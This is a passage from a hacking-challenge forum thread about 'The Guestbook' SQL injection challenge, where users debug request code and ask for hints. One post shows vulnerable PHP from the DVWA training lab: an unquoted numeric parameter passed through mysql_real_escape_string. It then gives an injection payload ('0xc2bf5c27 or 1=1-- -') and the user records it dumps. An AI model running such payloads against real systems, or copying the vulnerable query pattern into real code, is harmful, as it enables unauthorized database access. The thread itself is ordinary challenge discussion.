Username: 
Password: 
Restrict session to IP 

The Guesbook  Go to the The Guestbook challenge

1 2
Global Rank: 5
Totalscore: 549926
Posts: 199
Thanks: 207
UpVotes: 207
Registered: 14y 162d






Last Seen: 21s
The User is Online
RE: The Guesbook
Google/translate3Thank You!3Good Post!1Bad Post! link
Another game of "spot the error"... Nice distraction with the indentation. ;)
You're not sending the full request to the server.
Try reformatting your code.
line 14
echo $out1
You're a busy clicker Drool


You might also run into problems with checking eof in combination with HTTP/1.1, because the connection isn't closed immediately.
Last edited by tehron - Mar 06, 2012 - 13:23:15
Global Rank: 252
Totalscore: 87267
Posts: 1635
Thanks: 1336
UpVotes: 885
Registered: 16y 42d




Last Seen: 6h 1m
The User is Offline
RE: The Guesbook
Google/translate1Thank You!1Good Post!0Bad Post! link
Nice post, tehron.

I can see the error you have spotted now as well, and i actually looked for these myself, but it had to be in the last concat of course, when eyes are lazy.

Cheers!
The geeks shall inherit the properties and methods of object earth.
Global Rank: 15236
Totalscore: 79
Posts: 3
Thanks: 1
UpVotes: 0
Registered: 10y 321d
Last Seen: 10y 160d
The User is Offline
RE: The Guesbook
Google/translate0Thank You!0Good Post!0Bad Post! link
Hi Gizmore, I am able to bypass the mysql_escape_string() in my simulation lab (based on DVWA), encoding the '\' but can't bypass your guesbook with the same injection...Can you give us some hint?
Thanks in advance.
Global Rank: 252
Totalscore: 87267
Posts: 1635
Thanks: 1336
UpVotes: 885
Registered: 16y 42d




Last Seen: 6h 1m
The User is Offline
RE: The Guesbook
Google/translate0Thank You!0Good Post!0Bad Post! link
Maybe give us a hint how to bypass mysql_real_escape_string nowadays Euh

I call "impossibru"!

Smile
The geeks shall inherit the properties and methods of object earth.
Global Rank: 15236
Totalscore: 79
Posts: 3
Thanks: 1
UpVotes: 0
Registered: 10y 321d
Last Seen: 10y 160d
The User is Offline
RE: The Guesbook
Google/translate0Thank You!0Good Post!0Bad Post! link
As I said, in DVWA (mysql 5.5):
Code behind:
$id = trim($_GET['id']);
$id = mysql_real_escape_string($id);
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
$result = mysql_query($getid); // Removed 'or die' to suppres mysql errors


Injection chain ID: 0xc2bf5c27 or 1=1-- - (i.e. ¿\' or 1=1-- -, though also works without the ' (0x27)

Results:
ID: char(0xc2bf5c27) or 1=1-- -
First name: admin
Surname: admin

ID: char(0xc2bf5c27) or 1=1-- -
First name: Gordon
Surname: Brown

ID: char(0xc2bf5c27) or 1=1-- -
First name: Hack
Surname: Me

ID: char(0xc2bf5c27) or 1=1-- -
First name: Pablo
Surname: Picasso

ID: char(0xc2bf5c27) or 1=1-- -
First name: Bob
Surname: Smith

I am a bit confused about this challenge (I also have been considering a cookie injection but..)
Thanks Smile
Global Rank: 252
Totalscore: 87267
Posts: 1635
Thanks: 1336
UpVotes: 885
Registered: 16y 42d




Last Seen: 6h 1m
The User is Offline
RE: The Guesbook
Google/translate0Thank You!0Good Post!0Bad Post! link
Maybe you should take a look at the challenge's code Smile
The geeks shall inherit the properties and methods of object earth.
1 2
jacobs, Redknee, tunelko, silenttrack, n0tHappy, quangntenemy, TheHiveMind, Z, balicocat, Ge0, samuraiblanco, arraez, jcquinterov, hophuocthinh, alfamen2, burhanudinn123, Ben_Dover, stephanduran89, braddie0, SwolloW, dangarbri have subscribed to this thread and receive emails on new posts.
1 people are watching the thread at the moment.
This thread has been viewed 185195 times.